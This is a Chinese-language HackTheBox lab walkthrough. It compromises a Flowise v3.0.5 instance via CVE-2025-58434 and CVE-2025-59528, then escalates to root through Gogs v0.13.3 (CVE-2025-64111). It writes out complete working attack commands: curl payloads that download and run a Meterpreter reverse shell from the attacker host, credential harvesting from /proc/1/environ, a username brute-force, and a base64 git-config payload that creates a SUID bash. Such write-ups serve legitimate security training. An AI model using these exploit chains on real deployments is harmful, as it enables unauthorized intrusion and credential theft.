目标信息
IP地址:
10.129.212.243(非固定IP地址)
信息收集
ICMP检测
PING 10.129.212.243 (10.129.212.243) 56(84) bytes of data.
64 bytes from 10.129.212.243: icmp_seq=1 ttl=63 time=211 ms
64 bytes from 10.129.212.243: icmp_seq=2 ttl=63 time=138 ms
64 bytes from 10.129.212.243: icmp_seq=3 ttl=63 time=226 ms
64 bytes from 10.129.212.243: icmp_seq=4 ttl=63 time=156 ms
--- 10.129.212.243 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3003ms
rtt min/avg/max/mdev = 138.193/182.906/226.352/36.626 ms攻击机和靶机间网络连接状态良好。
防火墙检测
# Nmap 7.98 scan initiated Sun Apr 12 07:13:08 2026 as: /usr/lib/nmap/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.212.243
Nmap scan report for 10.129.212.243
Host is up (0.26s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http
# Nmap done at Sun Apr 12 07:13:48 2026 -- 1 IP address (1 host up) scanned in 40.22 seconds靶机疑似开放了2个TCP端口。
网络端口扫描
TCP端口扫描结果
# Nmap 7.98 scan initiated Sun Apr 12 07:20:21 2026 as: /usr/lib/nmap/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.212.243
Nmap scan report for 10.129.212.243
Host is up (0.23s latency).
Not shown: 65478 filtered tcp ports (no-response), 55 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_ 256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://silentium.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 465.22 ms 10.10.16.1
2 209.82 ms 10.129.212.243
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 12 07:21:32 2026 -- 1 IP address (1 host up) scanned in 70.47 secondsUDP端口开放列表扫描结果
# Nmap 7.98 scan initiated Sun Apr 12 07:22:07 2026 as: /usr/lib/nmap/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.212.243
Warning: 10.129.212.243 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.212.243
Host is up (0.49s latency).
All 65535 scanned ports on 10.129.212.243 are in ignored states.
Not shown: 65282 open|filtered udp ports (no-response), 253 closed udp ports (port-unreach)
# Nmap done at Sun Apr 12 07:26:19 2026 -- 1 IP address (1 host up) scanned in 252.52 secondsUDP端口详细信息扫描结果
(无)同时发现,靶机运行Ubuntu Linux操作系统,开放了22/ssh和80/http服务,根据HackTheBox内容规则,靶机主域名应当为silentium.htb。
服务探测
SSH服务(22端口)
尝试使用ssh命令连接靶机,确定其登录方式:
ssh root@silentium.htb
Web应用程序(80端口)
子域名枚举
在开始进行Web枚举前,首先进行虚拟主机爆破:
wfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 70 -u 10.129.212.252 -H "Host: FUZZ.silentium.htb" --hh 178 --hc 400
成功发现子域名:staging.silentium.htb
主站点枚举
打开主页:http://silentium.htb/
发现站点为某金融贷款机构的介绍页,直接扫描目录,但未发现任何信息。
staging站点枚举
打开主页:http://staging.silentium.htb/
发现靶机staging站点部署了Flowise大模型对话应用构建平台,尝试访问/api/v1/version获取其版本信息:
可见Flowise版本为v3.0.5。尝试联网搜索,发现一个任意用户密码重置漏洞CVE-2025-58434和一个授权命令执行漏洞CVE-2025-59528:
- Critical: Unauthenticated Password Reset Token Disclosure Leading to Account Takeover in Flowise Cloud and Local Deployments · Advisory · FlowiseAI/Flowise
- RCE in FlowiseAI/Flowise · Advisory · FlowiseAI/Flowise
通过阅读漏洞描述,我们可以得知上述漏洞的成因:任意用户密码重置漏洞的成因为处理密码重置Token生成请求时,将生成的Token值直接返回;命令执行漏洞的成因为Flowise处理添加MCP Server请求时,将未经过滤的用户输入传入了代码执行函数,导致RCE。
经分析研判,决定先通过CVE-2025-58434漏洞重置Flowise用户凭据,再利用CVE-2025-59528进行命令执行。
渗透测试
Flowise漏洞组合利用
在服务探测过程中,我们已经发现靶机Flowise v3.0.5系统存在漏洞CVE-2025-59528和CVE-2025-58434,下面进行利用。
由于目前不知道Flowise内存在的用户名,我们需要使用用户名字典进行爆破,直接根据EXP命令填写wfuzz参数:
wfuzz -w /usr/share/wordlists/seclists/Usernames/Names/names.txt -t 70 -X POST -H "Content-Type: application/json" -d '{"user":{"email":"FUZZ@silentium.htb"}}' --sc 201 http://staging.silentium.htb/api/v1/account/forgot-password
成功发现用户ben@silentium.htb,直接点击登录框中链接,进入忘记密码页面:
在电子邮箱框中填入发现的邮箱地址,按F12打开开发者栏,切换至网络选项卡监控HTTP请求:
成功获得密码重置Token!点击Change your password here链接,在密码重置页面内填入要重置的用户名电子邮箱和获得的Token:
随后点击Update Password按钮重置密码,接着在登录框中输入新设置的凭据登录:
登录成功!直接切换到API Keys界面,查看访问密钥:
成功发现API访问密钥:hWp_8jB76zi0VtKSr2d9TfGK1fm6NuNPg1uA-8FsUJc!
下一步是利用CVE-2025-59528漏洞执行任意命令,首先生成Meterpreter木马:
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.10.16.58 LPORT=443 -f elf -o reverse443生成完毕后,在本地打开SimpleHTTPServer和Metasploit监听,随后根据漏洞描述执行如下命令,下载并执行木马:
curl -X POST http://staging.silentium.htb/api/v1/node-load-method/customMCP -H "Content-Type: application/json" -H "Authorization: Bearer hWp_8jB76zi0VtKSr2d9TfGK1fm6NuNPg1uA-8FsUJc" -d '{"loadMethod": "listActions","inputs": {"mcpServerConfig": "({x:(function(){const cp = process.mainModule.require("child_process");cp.execSync("wget http://10.10.16.58/reverse443 -O /tmp/reverse443");return 1;})()})"}}'
curl -X POST http://staging.silentium.htb/api/v1/node-load-method/customMCP -H "Content-Type: application/json" -H "Authorization: Bearer hWp_8jB76zi0VtKSr2d9TfGK1fm6NuNPg1uA-8FsUJc" -d '{"loadMethod": "listActions","inputs": {"mcpServerConfig": "({x:(function(){const cp = process.mainModule.require("child_process");cp.execSync("chmod 777 /tmp/reverse443");return 1;})()})"}}'
curl -X POST http://staging.silentium.htb/api/v1/node-load-method/customMCP -H "Content-Type: application/json" -H "Authorization: Bearer hWp_8jB76zi0VtKSr2d9TfGK1fm6NuNPg1uA-8FsUJc" -d '{"loadMethod": "listActions","inputs": {"mcpServerConfig": "({x:(function(){const cp = process.mainModule.require("child_process");cp.execSync("/tmp/reverse443");return 1;})()})"}}'
成功!尝试执行getuid和sysinfo命令,发现当前环境为Docker容器,权限为root:
思考片刻,决定执行ps命令,查看当前容器进程列表:
发现Node.JS进程PID为1,尝试执行如下命令,查看该进程的环境变量:
cat /proc/1/environ
发现了如下可疑环境变量:
SENDER_EMAIL:ben@silentium.htbSMTP_PASSWORD:r04D!!_R4ge
于是决定使用如下用户凭据登录SSH:
- 用户名:
ben - 密码:
r04D!!_R4ge
ssh ben@silentium.htb
成功!!
权限提升
目录信息收集
登录ben用户后,进行目录信息收集。在/opt/目录下发现了名为gogs的子目录:
ls -lA /opt
以及Nginx站点配置文件/etc/nginx/sites-available/staging-v2-code:
成功发现子域名:staging-v2-code.dev.silentium.htb!打开页面查看:
发现该虚拟主机部署了Gogs在线代码托管系统,进入/opt/gogs目录枚举,发现管理程序/opt/gogs/gogs/gogs,执行可得版本为v0.13.3:
尝试联网搜索,发现存在授权命令执行漏洞CVE-2025-64111:RCE in repository put contents API · Advisory · gogs/gogs
决定使用该漏洞进行权限提升。
CVE-2025-64111漏洞利用
在目录信息收集阶段,我们已经成功发现靶机staging-v2-code.dev.silentium.htb子域名下部署了Gogs v0.13.3代码托管系统,且存在授权命令执行漏洞CVE-2025-64111,现在进行利用。
首先根据漏洞EXP描述,注册新用户demo:
点击按钮注册完毕后登录,通过右上角头像切换至用户设置页面:
首先返回SSH会话中执行生成SSH密钥的命令:
ssh-keygen
cat ~/.ssh/id_ed25519.pub
随后点击页面上的SSH Keys => Add Key按钮,将生成的SSH公钥添加到Gogs中:
接着转到Applications,点击Generate New Token生成访问密钥并保存:
这里生成的访问密钥为:26bc9728c2f268173ced4fad70eacd338dc4b70c。
前置条件准备完毕后进行利用,先点击右上方的加号,创建一个名为vul的仓库:
然后返回SSH会话,克隆Git仓库并创建指向.git/config配置文件的恶意软链接:
mkdir vul && cd vul
git init
git config user.name "demo"
git config user.email "demo@demo.com"
git remote add origin root@localhost:demo/vul.git
git remote set-url origin ssh://root@localhost/demo/vul.git
ln -s .git/config link
git add .
git commit -m "exploit"
git push -u origin master
成功创建带有恶意软链接的代码仓库!现在更新.git/config文件,添加sshCommand参数,设置SUID Bash:
curl -X PUT http://staging-v2-code.dev.silentium.htb/api/v1/repos/demo/vul/contents/link -H "Content-Type: application/json" -H "Authorization: token 26bc9728c2f268173ced4fad70eacd338dc4b70c" --data '{"message":"message","committer":{"name":"demo","email":"demo@demo.com"},"content":"W2NvcmVdCglyZXBvc2l0b3J5Zm9ybWF0dmVyc2lvbiA9IDAKCWZpbGVtb2RlID0gdHJ1ZQoJYmFyZSA9IGZhbHNlCglsb2dhbGxyZWZ1cGRhdGVzID0gdHJ1ZQoJaWdub3JlY2FzZSA9IHRydWUKCXByZWNvbXBvc2V1bmljb2RlID0gdHJ1ZQoJc3NoQ29tbWFuZCA9IGNobW9kIDQ3NTUgL2Jpbi9iYXNoCltyZW1vdGUgIm9yaWdpbiJdCgl1cmwgPSBzc2g6Ly9naXRAbG9jYWxob3N0L2RlbW8vdnVsLmdpdAoJZmV0Y2ggPSArcmVmcy9oZWFkcy8qOnJlZnMvcmVtb3Rlcy9vcmlnaW4vKgpbYnJhbmNoICJtYXN0ZXIiXQoJcmVtb3RlID0gb3JpZ2luCgltZXJnZSA9IHJlZnMvaGVhZHMvbWFzdGVy"}'
成功设置SUID Bash!直接执行更改密码命令:
/bin/bash -p
python3 -c "import os;os.setuid(0);os.setgid(0);os.system('passwd root')"最后切换到root用户:
su -
提权成功!!!!